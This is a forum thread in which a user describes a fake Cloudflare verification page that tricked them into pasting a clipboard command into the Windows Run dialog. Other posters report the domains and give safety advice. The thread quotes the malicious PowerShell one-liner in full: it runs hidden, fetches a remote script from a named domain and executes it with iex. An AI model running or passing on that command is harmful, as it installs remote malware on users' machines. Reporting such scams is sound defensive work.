Hi, I’m not sure where this thread/topic goes so please don’t remove it move it to right category. I think community should know about this i saw this virus for the first time. I trying to download YT video in 1080P with 3rd party downloader the site opened another tab a website with fake cloudflare verification page i believe link down below, Because i was working i forgot and thought it was my working site didn’t check URL. Site give me 3 Steps i thought it’s new security feature or something my clipboard had an script 2nd step was open Run in windows paste and press enter, Yes im dumb i did this i don’t know why i did this.
This was script
“powershell.exe -W Hidden -command $uR=‘https://dirol-netrol.com/poimi/toto.txt’; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t”
please tell me if my PC got any virus, the Windows defender notification said the threat was removed, Sorry for my English.
Similar lately happened here on another domain and Website:
Domain was reported to the Registrar for Abuse and is suspended.
If you’re able to help and write which one it is so we could report this as well. Thank you in advance.
Please, don’t use 3rd-party service for pirated stuff and install and use at least some anti-virus/malware software on your device for future protection.
Bot domains from your original topic are suspicious.
I’ve repoted this to the Webnic 1reg.club Registrar and Namecheap as a hosting provider moments ago since domain(s) were newely registered.
Antivirus is useless i had one installed for long time and my PC had virus for over an year, as soon as someone send me crypto on my wallet installed on PC they were stolen, so i don’t trust any antivirus, Just tell me know can understand this script, Should i run any other command if needed? defender quarantine files detected on C i removed those. Should i reinstall OS? or am i safe.
